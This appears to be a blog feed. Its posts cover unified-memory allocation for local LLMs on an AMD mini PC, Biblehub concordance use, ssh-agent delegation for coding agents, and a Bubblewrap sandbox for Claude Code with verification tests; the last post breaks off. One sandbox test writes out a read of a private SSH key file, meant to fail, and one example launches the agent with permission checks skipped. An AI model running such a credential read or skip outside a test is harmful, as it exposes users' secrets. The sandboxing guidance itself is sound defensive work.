Allocating RAM for GPU performance on self-hosted LLM systems with integrated system & GPU RAM

Are you sure that the system you’re running self-hosted LLMs on has properly allocated its GPU memory?

I was doing some work on my 128 GB AMD Ryzen mini PC. I operate this machine as a Linux server dedicated to self-hosted AI infrastructure. I had run into a performance problem where I saturated all resources and hit a hard lock. After rebooting to troubleshoot, I discovered that the system didn’t appear to be operating with 128 GB of RAM.

Diagnosing the problem

This machine’s purpose is hosting local AI inference. The product listing indicated 128 GB of unified memory. Did GMKTec/Amazon ship me the wrong unit? I checked system memory:

$ free -h
  Mem: 62Gi

Linux reported sixty-two gigabytes. Next I queried the GPU’s VRAM total from the kernel:

$ cat /sys/class/drm/card*/device/mem_info_vram_total
  68719476736

Sixty-four gigabytes on the graphics side, sixty-two visible to the operating system. Add them together and roughly 126 gigabytes are accounted for, but the OS alone was reporting only half of the memory I thought I paid for.

Memory in integrated GPU/CPU systems

The processor on this system carries an integrated GPU. Unlike desktop workstations, there is no discrete graphics card on a separate board with dedicated memory. Every byte of physical RAM lives in one unified pool of LPDDR5X shared between the CPU and GPU. I should have known this, but I didn’t; I haven’t built a gaming PC in over 20 years. On this hardware, the distinction between “system memory” and “graphics memory” exists only in firmware: the BIOS has settings for dividing the memory between the CPU and the GPU.

Integrated graphics have been operating this way for a while. Intel’s onboard GPUs quietly borrow from 128 megabytes up to a gigabyte or two from system RAM.

The Intel 810 chipset (1999) was Intel’s first integrated graphics chipset and used what Intel called “Unified Memory Architecture” (UMA). It borrowed 7-11 MB of system RAM for the GPU’s frame buffer, textures, and Z-buffer, managed by the chipset’s Graphics and Memory Controller Hub.

Intel later formalized this as DVMT (Dynamic Video Memory Technology), which let the graphics driver and OS dynamically allocate system RAM to the iGPU based on real-time demand. The BIOS setting “DVMT Pre-Allocated” (letting you choose 32 MB, 64 MB, 128 MB, etc.) became a standard fixture on Intel-based motherboards for the next two decades. https://www.techarp.com/bios-guide/dvmt-mode/ documents the DVMT modes in detail.

Intel’s own support documentation still explains this architecture for current hardware: https://www.intel.com/content/www/us/en/support/articles/000020962/graphics.html confirms that integrated Intel GPUs use system memory rather than a separate memory bank.

The kernel-level term is “stolen memory” (or Graphics Stolen Memory / GSM). https://igor-blue.github.io/2021/02/10/graphics-part1.html documents how the UEFI firmware reserves a region of physical RAM for the GPU through the Global GTT, managed by hardware and invisible to the OS’s general memory pool.

This design lineage runs from the Intel 810 in 1999 through every Intel iGPU since, with the same fundamental mechanism: firmware carves system RAM away from the OS and hands it to the GPU. The Strix Halo platform applies the same idea at 1000x the scale.

I’ve never noticed because I’ve been operating on macOS for the last 15 years.

The M-series chips (M1 through M4) share the same fundamental architecture: CPU, GPU, and Neural Engine all access one physical pool of memory. But Apple and AMD made different choices about how to manage that pool.

On Apple Silicon, macOS sees all the memory and allocates it dynamically. If you buy a MacBook with 64 GB of unified memory, top and Activity Monitor report 64 GB. The GPU draws from that pool on demand. The CPU draws from it on demand. No firmware partition divides them. When the GPU needs 20 GB for a rendering task, it gets 20 GB. When it finishes, that memory returns to the general pool. The OS arbitrates in real time.

But on this purpose-specific machine, the default resource allocation degrades performance. GMKTec appears to assume that Windows and gaming will be the main applications for this hardware. If your objective is running LLMs locally, the default config is going to need adjustments.

I reached out to GMKTec to ask whether there was a hardware problem. They indicated that the default config assigns 64 gigabytes to graphics and 64 gigabytes to the system. To fix this inefficient configuration, I needed to get into the BIOS and adjust the split.

Adjusting memory allocated to GPUs

That raised a practical question: how much memory should I allocate to the Host OS versus the GPU?

My system has Docker containers handling most of the system workload: a search engine, a workflow automation platform, a CMS, a kanban board, a chat interface for local models and the databases backing all of them. My Gnome/COSMIC desktop session was also running, plus a couple of terminal processes consuming their share of memory. Total system memory use hovered around 12 gigabytes. Fifty gigabytes of allocated system RAM sat idle.

The GPU told the same story from a different angle. Of its 64-gigabyte allocation, 330 megabytes held active data. The local inference server sat installed and waiting. Models rested on disk, ready to load, but nothing filled the VRAM. The GPU’s enormous partition accomplished almost nothing.

$ cat /sys/class/drm/card*/device/mem_info_vram_used
348594176

That returned 348,594,176 bytes, which is roughly 330 MB. The companion command for the total allocation was:

$ cat /sys/class/drm/card*/device/mem_info_vram_total
68719476736

That returned 68,719,476,736 bytes, which is 64 GB.

Both values come from the amdgpu kernel driver, which exposes them as sysfs files under /sys/class/drm/card*/device/. The mem_info_vram_used file reports how much of the GPU’s allocated partition is actively holding data at that moment. The mem_info_vram_total file reports the size of the partition itself.
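
The same arithmetic can be sketched in a few lines of Python (the byte counts are the values this machine returned; on a live system you would read them from the sysfs files above):

```python
# Values read from the sysfs files above, in bytes. A live read would be e.g.:
#   int(open("/sys/class/drm/card1/device/mem_info_vram_used").read())
used, total = 348_594_176, 68_719_476_736

def gib(n_bytes: int) -> float:
    """Convert a raw byte count to GiB."""
    return n_bytes / 2**30

print(f"{gib(used):.2f} GiB used of {gib(total):.0f} GiB "
      f"({100 * used / total:.2f}% of the GPU partition)")
```

Running this against the numbers above makes the waste obvious: about a third of a gigabyte in use out of a 64 GiB partition, roughly half a percent.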

This machine was built to run large language models. I wasn’t getting the utilization I expected. A 70-billion parameter model quantized to Q8 needs roughly 70 gigabytes of VRAM. With this system’s default, larger models don’t fit. I rebooted into the BIOS and bumped the GPU allocation to 96 gigabytes. The system side drops to 32 gigabytes, which still exceeds my current workloads by a wide margin. Twelve gigabytes of active use against 32 gigabytes of capacity leaves generous headroom for growth.

Post fix memory layout

Aside on model quantization

When you run something like ollama pull deepseek-coder-v2:16b, the quantization level is baked into that specific model file. If you look at the Ollama model library, you’ll typically see tags like:

  • model:7b-q4_0
  • model:7b-q5_K_M
  • model:7b-q8_0
  • model:7b-fp16

The Q4, Q5, Q8, fp16 suffixes indicate the quantization level. Lower numbers mean more compression (smaller file, less VRAM, lower quality). Higher numbers and fp16 mean less compression (larger file, more VRAM, better quality). Quantization reduces the numerical precision of a model’s weights. A weight stored at fp16 uses 16 bits. Q8 uses 8 bits. Q4 uses 4 bits. Fewer bits mean the weight carries a rounded approximation of its original value instead of the precise one the model learned during training.
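
A back-of-envelope sketch of how quantization maps to memory (rough numbers only; real model files add metadata, and inference also needs room for the KV cache and activations):

```python
def weight_gb(params_billions: float, bits_per_weight: float) -> float:
    """Approximate weight storage in decimal GB: parameters * bits / 8."""
    return params_billions * 1e9 * bits_per_weight / 8 / 1e9

# Why a 70B model at Q8 (~8 bits/weight) overflows a 64 GB GPU partition:
print(weight_gb(70, 8))    # 70.0 GB of weights alone
print(weight_gb(70, 4))    # 35.0 GB at Q4
print(weight_gb(7, 16))    # 14.0 GB for a 7B model at fp16
```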

Where you notice performance that is “higher quality”:

  • Complex reasoning chains. A Q4 model is more likely to lose the thread on multi-step logic, math problems, or long code generation. The accumulated rounding errors across billions of weights degrade the model’s ability to hold coherent structure over long outputs.
  • Nuance in language. Word choice becomes slightly flatter. A fp16 model might select a precise, unexpected word. The Q4 version gravitates toward more generic alternatives. The difference is hard to spot in a single response but becomes noticeable over a session.
  • Instruction following. Heavily quantized models drift from instructions more often. They might ignore a formatting constraint, repeat themselves, or partially answer a question. The precision loss makes the model slightly less responsive to the signal embedded in your prompt.
  • Factual reliability. Q4 models hallucinate marginally more. The degraded weights weaken the model’s ability to distinguish between what it “knows” confidently and what it is guessing at.

Where you probably won’t notice “lower quality” quantization levels:

  • Simple question and answer.
  • Casual conversation.
  • Summarization of short texts.

Ollama does not re-quantize a model at load time; you pick your quantization when you pull the model. With this change, I can now pull larger, higher-precision models for experimentation and training, which improves inference quality and makes for a far better experience.

Hope this helps. To summarize:

Several systems released in recent months are good candidates for running local LLMs. If you get a mini PC with AMD hardware, you will likely need to adjust the RAM split for your inference goals. I covered how a performance problem led me to discover issues with my config, and how to reason about changing that config for better performance.

Want help building self-hosted LLMs? Let’s connect!

Post Script:
If you’re exploring buying hardware for self-hosting and considering an AMD GPU, you should absolutely take some time to read https://strixhalo.wiki/Guides/Buyer’s_Guide

The Strix Halo wiki has a ton of valuable & relevant resources.

Some Bible Translatin’

Biblehub is a nice website with a finicky UI. Here are some instructions on how to use Biblehub’s “Strong’s Concordance” to perform two actions:

  • Researching the Greek language version of terms in the New Testament
  • Finding other passages in the Bible that use the relevant term

First, go to Biblehub and search a phrase, e.g. “Joyful Always” from 1 Thessalonians 5:16.

Note that when Biblehub finds a hit for this phrase, a drop-down item will appear that you can select. YOU MUST CLICK ON THE DROP-DOWN ITEM. Hitting “enter” takes you to a search of the database and just gives you a list of instances; clicking on the item takes you to the identified passage where the term is found. If no drop-down shows up, you may have a typo, or the page may be loading very slowly.

This will take you to the verse. You can select a Bible translation to compare the passage’s language across translations. Note the listings of all Bible versions:

Screenshot of different bible translations of the specified verse.

You now can compare different translations for their version of the statement. 

To research the Greek term for “rejoice always”, click on “Strong’s” from this page.

This will take you to a page that provides the original Greek for the translated section:

Greek translations of “Always Rejoice” from 1 Thessalonians 5:16

To find a cross-reference list of all other passages in the bible that use that term, click on the Greek word (in this case, Chairete). This enables you to see other passages that relate to the term.

Bible Passages that use the Greek word “Chairete”

You are now a scholar who can find the original Greek for your Bible passages, and find other Bible passages that reference the same term! Woo!

Giving coding agents ssh access without disclosing secrets

Giving LLM agents read access to private SSH keys is the hottest new security mistake since the hardcoded password.

You’ve set up Claude Code (or Cursor, or Copilot) and your coding agent needs to connect to a remote system.

The prompt asks you: how should the agent authenticate?

What’s going on here?

ssh-keyscan is a tool that connects to a remote host and retrieves its public SSH host keys. It reduces friction in ssh by letting you populate known_hosts ahead of time instead of being prompted to verify a new host’s key interactively.

Claude is trying to fetch the remote host’s public key and add it to the known_hosts file. That satisfies host verification, so an ssh connection won’t stall on an interactive “are you sure?” prompt, and it can then attempt a direct connection to the other system.

For extra safety, it won’t accept any scenario where the remote host’s SSH key has changed. This is “safe” because a host should rarely offer a new key; being regularly prompted to accept a new key for a host is an indicator that someone has brought a malicious server online with the same hostname. These measures are incomplete, though. In this instance, the agent is trying to connect to a host whose key it doesn’t have.

It’s making a valiant effort, but it will fail. I had copied a key to this system with ssh-copy-id, but I’m running Claude sandboxed, shielding the agent from access to the SSH key.

Some folks might entertain a dangerous solution: paste in your SSH key, set an environment variable, or hand over your Git credentials. It works… why worry?

You should be wondering:

Where will that secret actually go? Is it logged somewhere? Is the LLM provider training against my private key? Can the agent exfiltrate it? What happens if the agent’s process gets compromised?

The moment you hand a credential to an AI agent, you’ve lost control of it. You can’t audit where it went, you can’t revoke access without rotating secrets, and you’ve given an LLM a secret that must never leak. Chat histories fill up with desirable secrets. This should be concerning.

There is a better way to give your agents access to other systems than handing them a private key. It’s been around for decades. Networking and operations engineers use it all the time, but it seems to be less well known among devs. By the end of this post, you’ll know how to give a coding agent full SSH authentication capability while ensuring the agent never sees your private key. Access is revocable with a single command, and even a fully compromised agent can’t steal your private keys.

What is SSH-agent?

ssh-agent is a background process that holds your decrypted private keys in memory so you don’t have to re-enter your passphrase every time you use them.

How ssh-agent works:

  1. Your private key (e.g. ~/.ssh/id_ed25519) is stored encrypted on disk, protected by your passphrase
  2. You run ssh-add to decrypt the key and hand it to the agent
  3. The agent holds the decrypted key in memory
  4. When you ssh somewhere, the SSH client asks the agent to perform the cryptographic signing — the private key never leaves the agent process

Why ssh-agent exists:

  • Convenience — type your passphrase once per session instead of every connection
  • Security — the decrypted key lives only in memory, never written to disk unencrypted. Programs that need to authenticate
    ask the agent rather than accessing the key file directly
  • Forwarding — with ssh -A, the agent can be forwarded to remote hosts so you can hop between machines without copying your private key around. It’s essentially a secure key wallet that runs in the background for the duration of your login session.

How ssh-agent keeps ssh keys private from AI

ssh-agent implements a delegation without disclosure pattern:


  ┌─────────────┐        ┌───────────┐        ┌──────────────┐
  │  ssh-agent  │◄───────│  Coding   │───────►│  Remote Host │
  │ (your keys) │ signs  │  Agent    │  SSH   │  (GitHub,    │
  │             │ data   │  process  │  conn  │   server)    │
  └─────────────┘        └───────────┘        └──────────────┘
  1. You start ssh-agent and unlock your key with ssh-add
  2. The coding agent inherits the $SSH_AUTH_SOCK environment variable — a Unix socket path to where the ssh-agent process is listening.
  3. When the agent needs to authenticate, SSH asks the agent process to sign a challenge
  4. The agent process asks ssh-agent (via the socket) to do the signing
  5. ssh-agent signs the challenge and returns the signature
  6. The private key never crosses the socket. Only signatures go back.

When you start ssh-agent, it creates a socket file (e.g., /tmp/ssh-XXXXX/agent.12345) and exports the $SSH_AUTH_SOCK environment variable, which points to that socket. Any process that inherits this variable can communicate with the agent. SSH clients use this socket to ask ssh-agent to sign authentication challenges. The socket is a communication channel, not a credential: reading the variable only gives you a path, and without the ssh-agent process behind it, the socket is useless. This lets your coding agent ask ssh-agent to sign its requests without ever having access to the private key.
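
To make the “channel, not credential” point concrete, here is a small sketch of the agent wire protocol (message numbers from the OpenSSH agent protocol; the live socket connection is left as a comment since it needs a running agent):

```python
import struct

SSH_AGENTC_REQUEST_IDENTITIES = 11   # client -> agent: "list your keys"
SSH_AGENT_IDENTITIES_ANSWER = 12     # agent -> client: key list

def build_frame(msg_type: int, payload: bytes = b"") -> bytes:
    # Every agent message is a 4-byte big-endian length, then type, then payload.
    body = bytes([msg_type]) + payload
    return struct.pack(">I", len(body)) + body

def parse_frame(frame: bytes) -> tuple:
    (length,) = struct.unpack(">I", frame[:4])
    body = frame[4:4 + length]
    return body[0], body[1:]

req = build_frame(SSH_AGENTC_REQUEST_IDENTITIES)
# To talk to a live agent:
#   sock = socket.socket(socket.AF_UNIX)
#   sock.connect(os.environ["SSH_AUTH_SOCK"])
#   sock.sendall(req)
# Here we just parse a canned "zero keys" answer an agent could return:
reply = build_frame(SSH_AGENT_IDENTITIES_ANSWER, struct.pack(">I", 0))
msg_type, payload = parse_frame(reply)
```

The point of the framing: requests and signatures cross the socket, but private key bytes never do.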

You may ask: how do I keep rogue processes from requesting signatures from ssh-agent? Unfortunately, if they’re running under your user account, you’re going to have challenges: everything that runs as you has the same access rights as you. You’d want to move potentially rogue processes to another user account and apply some ACLs. The nice thing about ssh-agent is that you can simply kill it when you’re done delegating SSH authentication to agentic processes. But if you need to be cautious:

  • Run the agent in a sandboxed environment (container, VM) with its own ssh-agent holding limited-scope keys
  • Use deploy keys with read-only access instead of your personal key
  • Use short-lived certificates (e.g., via Vault or Teleport) instead of long-lived keys

Why This Matters for AI Agents Specifically

Least privilege by design The agent can authenticate but cannot exfiltrate the secret. Even if the agent’s process is compromised, the attacker gets a socket that only works while your agent session is alive — not a portable credential.

Auditability The agent can’t copy the key and use it later or from another machine. Access is bound to the lifetime of the socket.

Revocability Kill the ssh-agent process or remove the key with ssh-add -d, and the agent instantly loses access. No secret rotation needed.

No secret in the environment Compare this to the common pattern of stuffing API_KEY=sk-… into environment variables.
Those can be read by any process, printed with env, leaked in logs. The SSH_AUTH_SOCK only points to a socket. Reading the path to a socket is generally not a security sensitive action.

The capability-based security model

This is an instance of a capability-based security model. Instead of sharing a secret (something you know), you share a capability (something you can do through a controlled channel). The coding agent gets the capability to authenticate as you, scoped to:

  • Time — only while the agent process runs
  • Mechanism — only through the SSH protocol
  • Operation — only signing challenges, not extracting keys

This is the same idea behind hardware security modules (HSMs), smart cards, and FIDO keys — the secret never leaves a trusted boundary, and all consumers interact through a signing oracle.
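
The pattern can be illustrated with a toy signing oracle (a hypothetical sketch using HMAC in place of real SSH key signatures; ssh-agent speaks its own protocol, but the trust boundary is the same):

```python
import hmac, hashlib

class SigningOracle:
    """Holds the secret privately; consumers get signatures, never the key."""
    def __init__(self, secret: bytes):
        self._secret = secret          # never returned to callers

    def sign(self, challenge: bytes) -> bytes:
        # The only operation exposed: sign a challenge with the secret.
        return hmac.new(self._secret, challenge, hashlib.sha256).digest()

oracle = SigningOracle(b"private-key-material")
signature = oracle.sign(b"server-auth-challenge")

# A consumer (the coding agent) can present the signature to a verifier,
# but nothing in this interface lets it read the secret itself.
print(len(signature))   # 32-byte SHA-256 HMAC
```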

Practical Example

Start the session:

eval "$(ssh-agent -s)"

Add your key to the agent:

ssh-add ~/.ssh/id_ed25519

You’ll be prompted for the key’s passphrase; from then on, ssh-agent can sign requests without exposing the private key.

You can now launch your coding agent: it inherits SSH_AUTH_SOCK and can git pull, ssh deploy, etc. When you’re done, kill the agent:

ssh-agent -k # all delegated access revoked instantly

Killing the agent kills the socket. A coding agent can be invoked with full SSH access without ever reading a secret.

Agent frameworks should be built using capability delegation. Don’t give AI agents read access to credentials. ssh-agent is a tool you can use to provision access privileges without disclosing secrets. It’s a key tool for granting AI systems access to infrastructure.

Do you need help building secure agentic products and workflows?

Let’s connect!

Post script:

After posting on LinkedIn, Luke Hinds observed similar ideas behind a recent pull request by Francois Proulux, which added UNIX domain sockets supporting Secure Enclave-backed ssh-agents in Nono.sh. Worth a look!

A detailed writeup of Claude Code constrained by Bubblewrap.

An AI agent that can edit files can also delete them. Here’s a detailed explanation of how I set boundaries while still keeping Claude powerful.

When you let an AI assistant run commands on your computer, you face a problem: the assistant needs enough access to help you, but you don’t want it wandering through your entire system, reading your .env files, or scanning your photos. Last week I wrote about how you can use Bubblewrap to prevent agents from accessing your files. There were some interesting comments on HackerNews that inspired me to do some further experimentation and explanation of my config.

I wanted to write a more detailed summary of this config for anyone trying to incorporate bubblewrap into their workflow. I also want to make it insanely easy for you to get started with your bubble wrapping. To that end, I have a couple of Git repositories you can clone to get started.

If you want to get started with bubblewrap+claude, you can use one of my sample scripts. Btw, I also created versions for Firejail and Apple’s “Containers”.

https://github.com/CaptainMcCrank/SandboxedClaudeCode

The bubblewrap script passes all arguments through to Claude via “$@”. Just append your arguments after the script:

./bubblewrap_claude.sh --dangerously-skip-permissions "ruminate on the nature of life"

Don’t trust strangers on the Internet. Here is a Git repository of tests you can use to prove whether the containers work. Read them and understand them; the exposition below explains each test in detail and will help you execute the tests and validate that the controls work.

https://github.com/CaptainMcCrank/BlogCode/tree/main/BubblewrapTests

The approach above gives your bubblewrap container access to a deliberately limited file system: your project directory, plus the read-only tools and configs described below.

I welcome collaboration! Please file git issues against my code if you think you have a better approach!


The Complete Command

Here’s the full Bubblewrap command. Save this as a script (e.g., sandboxed-claude.sh), make it executable with chmod +x sandboxed-claude.sh, then run it from any project directory.

#!/usr/bin/env bash

# Optional paths - only bind if they exist
OPTIONAL_BINDS=""
[ -d "$HOME/.nvm" ] && OPTIONAL_BINDS="$OPTIONAL_BINDS --ro-bind $HOME/.nvm $HOME/.nvm"
[ -d "$HOME/.config/git" ] && OPTIONAL_BINDS="$OPTIONAL_BINDS --ro-bind $HOME/.config/git $HOME/.config/git"

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind /etc/resolv.conf /etc/resolv.conf \
  --ro-bind /etc/hosts /etc/hosts \
  --ro-bind /etc/ssl /etc/ssl \
  --ro-bind /etc/passwd /etc/passwd \
  --ro-bind /etc/group /etc/group \
  --ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts" \
  --bind "$(dirname "$SSH_AUTH_SOCK")" "$(dirname "$SSH_AUTH_SOCK")" \
  --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
  $OPTIONAL_BINDS \
  --ro-bind "$HOME/.local" "$HOME/.local" \
  --bind "$HOME/.npm" "$HOME/.npm" \
  --bind "$HOME/.claude" "$HOME/.claude" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --setenv HOME "$HOME" \
  --setenv USER "$USER" \
  --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
  --share-net \
  --unshare-pid \
  --die-with-parent \
  --chdir "$PWD" \
  "$(which claude)" "$@"

This looks complex. I promise it’s not. The only weirdness is at the beginning, where the script checks for optional paths like .nvm and .config/git before binding them. Not everyone uses nvm for Node.js management, and git’s config directory location varies. If you use other version managers (like fnm, asdf, or volta), add similar conditional binds for their directories.

The rest of this post explains what each piece does and why I included it.


The System Tools

Your computer stores its programs in folders like /usr, /lib, and /bin. These folders contain thousands of tools: file editors, network utilities, programming languages, and more.

I give the AI read-only access to these folders. “Read-only” means the AI can use these tools but cannot change them. The AI can run git to manage code. The AI can run node to execute JavaScript. But the AI cannot replace these programs with different versions or delete them.

Without these folders, every command fails with “command not found.” The sandbox contains no programs to run.

I also share a few files from /etc, your computer’s configuration folder:

  • /etc/resolv.conf: Without this, DNS lookups fail. The AI cannot translate “github.com” into an IP address, so git clone and npm install break.
  • /etc/ssl: Without this, HTTPS connections fail. The AI cannot verify that a server is who it claims to be.
  • /etc/passwd and /etc/group: Without these, programs display raw numeric IDs instead of usernames. Git commits show “1000” instead of “patrick.”

Your Personal Files

You keep important files in your home folder. Git needs your .gitconfig file to know your name and email. Node.js lives in your .nvm folder.

I share these files as read-only. The AI can use your git identity to make commits. But the AI cannot change your git settings or modify your configuration files.

SSH Access Without Exposing Your Keys

SSH keys prove your identity to remote servers. Exposing them directly to the sandbox creates risk—the AI could read your private key files. I use a safer approach: SSH agent forwarding.

The SSH agent runs outside the sandbox on your host machine. It holds your decrypted keys in memory. Programs inside the sandbox can ask the agent to sign requests, but they never see the actual key material.

Here’s how to set it up:

Step 1: Start the SSH agent (if not already running)

Most Linux desktop environments start the agent automatically. Check if yours is running:

echo $SSH_AUTH_SOCK

If this prints a path like /run/user/1000/keyring/ssh, your agent is running and you’re set.

Important: If SSH_AUTH_SOCK is empty, you can start an agent manually with eval "$(ssh-agent -s)". However, manually started agents create sockets under /tmp (e.g., /tmp/ssh-XXXXX/agent.1234). This conflicts with our sandbox’s --tmpfs /tmp mount, which creates an isolated /tmp that hides the host’s socket.

If you must use a manually started agent, either:

  1. Start the agent with a custom socket location: ssh-agent -a /run/user/$(id -u)/ssh-agent.sock and export SSH_AUTH_SOCK accordingly
  2. Or move the --tmpfs /tmp line in the script to appear before the --bind "$(dirname $SSH_AUTH_SOCK)" line (bind mounts take precedence over earlier tmpfs mounts for their specific paths)

For simplicity, I’d recommend using your desktop environment’s built-in agent when possible.

Step 2: Add your key to the agent

ssh-add ~/.ssh/id_ed25519

Replace id_ed25519 with your key’s filename. The agent prompts for your passphrase once, then holds the decrypted key in memory.

Step 3 (Optional but recommended): Require confirmation for each use

ssh-add -c ~/.ssh/id_ed25519

The -c flag tells the agent to ask for confirmation every time something tries to use the key. A dialog box appears on your screen: “Allow use of key?” You must click confirm. The AI cannot bypass this—the prompt happens outside the sandbox.

What this buys you:

  Approach                 | AI can read private key? | AI can use key silently?
  Direct ~/.ssh binding    | Yes                      | Yes
  SSH agent                | No                       | Yes
  SSH agent with -c flag   | No                       | No

The sandbox script binds only ~/.ssh/known_hosts (so SSH can verify server identities) and the agent socket (so SSH can request signatures). Your private key files stay outside the sandbox entirely.


The Working Directory

Your goal is to develop software within a specific project folder. The AI needs write access to that folder to create files, modify code, and delete outdated artifacts.

I bind the current working directory ($PWD) with read-write access. When you run the sandbox script from /home/youruser/projects/my-app, the AI can modify anything inside my-app. When you run it from a different folder, the AI works there instead. The sandbox adapts to wherever you invoke it.

This scoping provides two benefits. First, the AI can do useful work—writing code, running builds, managing files. Second, the AI cannot touch anything outside that folder. Your other projects, your documents, your system files all remain invisible and unreachable.

I also give write access to two other locations outside your project folder.

The .npm folder stores downloaded packages. When the AI runs npm install, npm caches packages here so future installs run faster. Without write access, the AI could still install packages into your project’s node_modules, but every install would re-download everything from scratch. With write access to .npm, the AI can install dependencies at normal speed and benefit from cached packages across all your projects.

The .claude folder stores authentication credentials. This binding deserves special attention. When you first run Claude, you authenticate through your browser. Claude stores a session token in ~/.claude so you don’t repeat this process every time. Without write access to this folder, the sandbox cannot persist your login. You would need to re-authenticate every time you start the sandboxed Claude—a significant usability problem. With write access, you log in once and the session persists across sandbox invocations.


The Fake Temporary Folder

Every program needs a place to store temporary files. Normally, programs use /tmp, a shared folder visible to everything on your computer.

I create a fake /tmp that only the AI can see. When the AI writes temporary files, those files exist only inside the sandbox. When the sandbox closes, those files vanish.

This prevents the AI from leaving debris scattered across your system. It also prevents the AI from reading temporary files that other programs created.


Process Isolation

Your computer runs hundreds of processes at once: your web browser, your music player, system services, and more. Normally, any program can see the full list.

The --unshare-pid flag creates a separate process namespace for the sandbox. When the AI looks at running processes, it sees only itself and the programs it started. Your browser, your email client, your other terminals—all invisible. This prevents the AI from sending signals to other programs or inspecting what they do.

The --die-with-parent flag sets a kill switch: if the parent process dies, the sandbox dies with it. No orphaned AI processes linger after you close your terminal.


The Network Question

Networks present the hardest choice.

An AI with network access can clone repositories, install packages, and fetch documentation. An AI without network access cannot do any of those things.

An AI with network access can also send files or other information to external servers. This represents a real risk when working with private codebases.

I chose to allow network access. Most programming tasks require it. But you should understand: anything the AI can read, the AI can theoretically transmit elsewhere.

A paranoid setup would disable networking entirely. You would pre-download all dependencies, clone all repositories ahead of time, and work offline. This approach works for high-security situations but breaks the normal development workflow.


What This Buys You

The sandbox prevents accidents and limits damage.

The AI cannot read your documents, photos, or browser history—I never shared those folders. The AI cannot install system-wide packages or modify your shell configuration. The AI cannot see your password manager or read your email.

The AI operates in a controlled space: your project folder, plus the tools needed to work on it.


What This Does Not Buy You

The sandbox does not prevent a determined attack through the network. If the AI decided to exfiltrate your code, network access makes that possible.

The sandbox does not prevent damage to your project folder. The AI has full write access there—it can delete everything.

Security involves tradeoffs. I have tried to balance usability and protection. A tighter sandbox would be safer but harder to use during experimentation & rapid development.

This configuration is useful for everyday development work: it protects against casual mistakes but may be vulnerable to sophisticated attacks. For most scrappy programming tasks, this balance should be sufficient.


Testing Your Sandbox

Before trusting your sandbox, verify it works. These commands let you poke at the walls and confirm they hold.

Test 1: Confirm your home directory contents are hidden

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "ls $HOME/.bashrc 2>&1; ls $HOME/Documents 2>&1"

Both commands should fail with “No such file or directory”. Note that ls $HOME itself may show a partial directory structure (like Development) because Bubblewrap creates the path hierarchy needed to reach your bound $PWD. But the actual contents of your home folder—config files, documents, other projects—remain invisible.

Test 2: Confirm you cannot write to read-only paths

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "echo 'test' >> $HOME/.gitconfig"

This should fail with “Read-only file system”. The sandbox prevents writes to paths mounted with --ro-bind.

Test 3: Confirm you CAN write to the working directory

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/sh -c "touch sandbox-test-file && rm sandbox-test-file && echo 'Write access confirmed'"

This should print “Write access confirmed”. The sandbox allows writes to paths mounted with --bind.

Test 4: Confirm process isolation

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --unshare-pid \
  --chdir "$PWD" \
  /bin/ps aux

This should show only a few processes (ps itself and its parent). Your browser, terminal, and other applications stay hidden.

Test 5: Confirm /tmp isolation

Run this in one terminal:

echo "secret from host" > /tmp/host-secret.txt

Then run this in the sandbox:

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --chdir "$PWD" \
  /bin/cat /tmp/host-secret.txt

This should fail with “No such file or directory”. The sandbox has its own empty /tmp and cannot see files in the host’s /tmp.

Test 6: Confirm SSH agent works but keys are hidden

First, verify you have a key loaded in your agent:

ssh-add -l

This should list your key. Now test that the sandbox can use the agent but cannot read the key file:

bwrap \
  --ro-bind /usr /usr \
  --ro-bind /lib /lib \
  --ro-bind /lib64 /lib64 \
  --ro-bind /bin /bin \
  --ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts" \
  --bind "$(dirname $SSH_AUTH_SOCK)" "$(dirname $SSH_AUTH_SOCK)" \
  --bind "$PWD" "$PWD" \
  --tmpfs /tmp \
  --proc /proc \
  --dev /dev \
  --setenv SSH_AUTH_SOCK "$SSH_AUTH_SOCK" \
  --chdir "$PWD" \
  /bin/sh -c "ssh-add -l && cat ~/.ssh/id_ed25519"

The first command (ssh-add -l) should succeed and list your keys. The second command (cat ~/.ssh/id_ed25519) should fail with “No such file or directory”. The sandbox can use your SSH identity through the agent, but cannot read the private key file itself.


If all six tests pass, your sandbox walls are solid. The AI operates in the space you defined—no more, no less. Again: you can just git clone these tests from https://github.com/CaptainMcCrank/BlogCode/tree/main/BubblewrapTests.

Happy hacking!

A better way to limit Claude Code (and other coding agents!) access to Secrets

Last week I wrote a thing about how to run Claude Code when you don’t trust Claude Code. I proposed creating a dedicated user account & standard Unix access controls. The objective was to stop Claude from dancing through your .env files, eating your secrets. There are some usability problems with that guide, so I found a better approach I wanted to share.

TL;DR: Use Bubblewrap to sandbox Claude Code (and other AI agents) without trusting anyone’s implementation but your own. It’s simpler than Docker and more secure than a dedicated user account. Bubblewrap delivers a sweet spot combination of control AND flexibility that enables experimentation.

What Changed Since My Last Post

